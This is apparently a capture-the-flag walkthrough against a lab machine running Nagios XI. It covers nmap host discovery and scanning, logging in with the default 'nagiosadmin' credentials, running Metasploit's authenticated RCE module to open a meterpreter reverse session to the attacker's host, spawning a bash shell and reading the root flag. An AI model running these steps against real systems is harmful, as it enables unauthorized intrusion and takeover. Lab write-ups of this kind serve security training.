Let’s discover the IP Address of the Machine. for discovering the target IP address we use the Nmap ping scan.
nmap -sn 192.168.43.1/24
We found the target’s IP Address 192.168.43.152. and our next step is to scanning open ports target machine by using the Nmap tool.
sudo nmap -A 192.168.43.152
we performed a Nmap scan for OS detection, version detection, and we see many ports are open target machine.
For more details, we will need to start enumeration against the target machine. Therefore, we will navigate to a web browser for exploring HTTP service. landing page not give useful information. since we see in Nmap scan Http-title: Nagios XI
Let’s explore the /nagiosxi log in page URL and here we try some common password like admin-admin, admin-password, admin-root but we couldn’t log in with cms and again I try to log in and try the default username nagiosadmin and we will log in with cms panel.
we search exploit for Nagios XI and we found an authenticated_rce exploit. let’s load the msfconsole and load the exploit nagios_xi_authenticated_rce.
sudo msfconsole use exploit/linux/http/nagios_xi_authenticated_rce
set rhosts 192.168.43.152 set lhost 192.168.43.103 set password admin run
After run the exploit we got a meterpreter connection target machine let’s run the shell command for the bash shell environment.
shell python -c 'import pty;pty.spawn("/bin/bash")' cd /root
now we have proper root shell. let’s move the /root directory and read our final root flag.
ls cat proof.txt